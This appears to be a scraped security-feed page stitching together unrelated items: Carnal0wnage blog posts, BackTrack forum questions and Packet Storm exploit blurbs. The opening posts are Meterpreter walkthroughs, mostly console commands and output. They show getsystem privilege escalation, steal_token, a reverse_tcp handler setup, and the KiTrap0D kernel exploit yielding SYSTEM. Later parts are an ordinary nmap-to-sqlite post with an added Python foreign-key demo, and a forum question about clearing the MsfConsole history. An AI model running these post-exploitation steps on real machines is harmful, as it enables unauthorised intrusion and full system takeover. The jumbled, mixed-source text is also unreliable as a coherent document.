1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey I want user back!
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell
Process 1272 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
Wait, I want a SYSTEM shell again:
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
Or call execute without -t to use your process token:
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
Carnal0wnage
More for documentation and historical purposes than "new hotness".
Original advisory:
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit:
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
remote-exploit & backtrack
So I've played around with metasploit for a while now, pentesting my own network. One problem: Once I have successfully gotten a meterpreter shell, I cannot figure out how to correctly modify/add a registry value with a space in the path.
for example, if I run this:
HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v fred -d 0
it tries to do something with:
HKLM\\Software\\Microsoft\\Windows
I have tried to enclose it in quotes, like you would in a windows command shell, and several other things to no avail.
Any help would be much appreciated.
(Unfortunately, I am running Metasploit under Windows, so could this cause slight syntax problems?)
4:41
remote-exploit & backtrack
Does anyone know how to clear the MsfConsole command-line history??? Thanks a lot :)
13:00
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the defer script, an attacker may be able to execute arbitrary code.
5:52
remote-exploit & backtrack
Hi all,
I know that we could set up a web server using Metasploit, but I can't access it over the internet; it's accessible inside the LAN but not over the net.. Wondering why...
any help would be appreciated.
14:25
remote-exploit & backtrack
Hi,
I hope this is the right place to ask this.
When I use Metasploit it works very well on my local network,
but when I want to pentest outside my local network it doesn't work :confused:
Can someone tell me why?
6:45
Carnal0wnage
So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.
Wait, isn't there something that already does that?!
Actually PBNJ and nmap_xml2sql.pl will do this, but they use (eeeek!) perl to do it. I wanted to do it in Ruby.
Your options for Ruby & Nmap parsing are:
-rubynmap http://rubynmap.sourceforge.net/
-ruby-nmap http://ruby-nmap.rubyforge.org/
-metasploit has its own nmap xml parser
-writing your own
I started with rubynmap for my parsing gem.
(Note: use the svn version. The version # hasn't changed, but the svn version works a lot better.)
I stole the schema from nmap_xml2sql and added a few things and a scripts table for nmap scripts output and tried shoving that into a sqlite3 database.
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER)
CREATE TABLE hosts (
sid INTEGER,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT)
----SNIP----
This "works" but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap, that value wasn't linking up in hosts, and the same for the HID value in subsequent tables. If I'm wrong here please let me know if this works for you as written. For me it populates with nulls and I don't see how it's linking back to the tables.
cg@ihatesql:~$ sqlite3 nmap
SQLite version 3.6.21
sqlite> .dump nmap
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml 209.20.85.250','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);
COMMIT;
sqlite> .dump hosts
CREATE TABLE hosts (
sid INTEGER ,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER,
);
INSERT INTO "hosts" VALUES(NULL,1,'209.20.85.250','209-20-85-250.slicehost.net','up','','','','','',1262181807,1262181814);
COMMIT;
So we can see that the SID and HID are correctly auto-incrementing, but the SID didn't make it into the hosts table.
**Actually sqlite3 as of 3.6.19 supports foreign keys...by adding a
FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on. And by declaring PRAGMA foreign_keys = ON.
BUT I still couldn't get it to work.
Doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors, but doing a dump on the table would list the foreign key support as OFF :-( Maybe it's a gem issue?
So to cheat I added ip4num, ip6, hostname to tables I knew I'd be querying a lot, like ports and scripts.
CREATE TABLE ports (
hid INTEGER,
ip4num INTEGER,
ip6 TEXT,
port INTEGER,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,
FOREIGN KEY(hid) REFERENCES hosts(hid)
)
That way, querying for open ports or specific versions of a service was possible and I could still get an IP associated with that. A bit harder to pull all that information together, but still there, and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.
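Added example, not the post's own Ruby scripts (it uses Python's standard-library sqlite3 module rather than the Ruby gem so it runs with no extra install): it keeps the post's FOREIGN KEY(sid) REFERENCES nmap(sid) layout and shows the two things a practitioner would want to check here. PRAGMA foreign_keys is a per-connection setting, so a separate connection (a sqlite3 CLI session opened to inspect the file, for instance) reports OFF no matter what the loader did; and once it is ON for the loading connection, a hosts row that points at a non-existent scan is rejected instead of quietly landing with a dangling link. Table columns are trimmed to the essentials and the hosts are constructed sample values.

```python
import os, sqlite3, tempfile

# Trimmed version of the post's nmap/hosts tables plus the FOREIGN KEY it adds.
SCHEMA = """
CREATE TABLE nmap (sid INTEGER PRIMARY KEY AUTOINCREMENT, args TEXT);
CREATE TABLE hosts (sid INTEGER, hid INTEGER PRIMARY KEY AUTOINCREMENT, ip4 TEXT,
                    hostname TEXT, FOREIGN KEY(sid) REFERENCES nmap(sid));
"""
# Constructed sample hosts, not real scan output.
SAMPLE_HOSTS = [("192.0.2.10", "db1.example.test"), ("192.0.2.11", "web1.example.test")]

def open_db(path, enforce_fks=True):
    # Enforcement is per connection: a fresh connection (CLI included) starts OFF.
    db = sqlite3.connect(path)
    if enforce_fks:
        db.execute("PRAGMA foreign_keys = ON")
    return db

def fk_enabled(db):
    return db.execute("PRAGMA foreign_keys").fetchone()[0] == 1

def load_scan(db, args, hosts):
    # Link each host to the scan by the sid SQLite generated, not a NULL.
    sid = db.execute("INSERT INTO nmap (args) VALUES (?)", (args,)).lastrowid
    db.executemany("INSERT INTO hosts (sid, ip4, hostname) VALUES (?, ?, ?)",
                   [(sid, ip4, name) for ip4, name in hosts])
    db.commit()
    return sid

def orphan_host_rejected(db):
    # True when a hosts row pointing at a scan that does not exist is refused.
    try:
        db.execute("INSERT INTO hosts (sid, ip4) VALUES (9999, '192.0.2.99')")
        rejected = False
    except sqlite3.IntegrityError:
        rejected = True
    db.rollback()  # keep neither the probe row nor a dangling transaction
    return rejected

def run_demo():
    path = os.path.join(tempfile.mkdtemp(), "nmap.db")
    db = open_db(path)
    db.executescript(SCHEMA)
    sid = load_scan(db, "nmap -A -oX test.xml 192.0.2.0/28", SAMPLE_HOSTS)
    other = open_db(path, enforce_fks=False)  # what a separate CLI session sees
    return {"sid": sid, "fk_here": fk_enabled(db), "fk_other": fk_enabled(other),
            "orphan_rejected": orphan_host_rejected(db),
            "orphan_slips_through_other": not orphan_host_rejected(other),
            "linked_hosts": db.execute("SELECT count(*) FROM hosts WHERE sid = ?",
                                       (sid,)).fetchone()[0]}
```

The same per-connection rule applies to the Ruby gem: the PRAGMA has to be issued on the very connection that does the inserts, and checking it from another connection says nothing about that one.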
So code or it didn't happen...
nmap-parse takes an nmap xml file and spits out some of the results
http://carnal0wnage.attackresearch.com/sites/default/files/nmap-parse.txt
rubynmapsqlite3 takes an nmapfile and database name (optional), creates or connects to the database, populates the tables if it needs to, parses the nmap xml and puts it into its appropriate tables.
http://carnal0wnage.attackresearch.com/sites/default/files/nmapsqlite3.txt
ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files
http://carnal0wnage.attackresearch.com/sites/default/files/ruby-nmap-parse.txt
caveats:
-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code
Next up pushing that data into a postgres database instead of sqlite3.
1:00
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in Easy Chat Server by passing an arbitrary evil buffer along with the username and password. A successful attack could run arbitrary code on a victim's machine.
11:53
remote-exploit & backtrack
Good day everyone,
Can anyone tell me how to clear the MsfConsole command-line history?
Thanks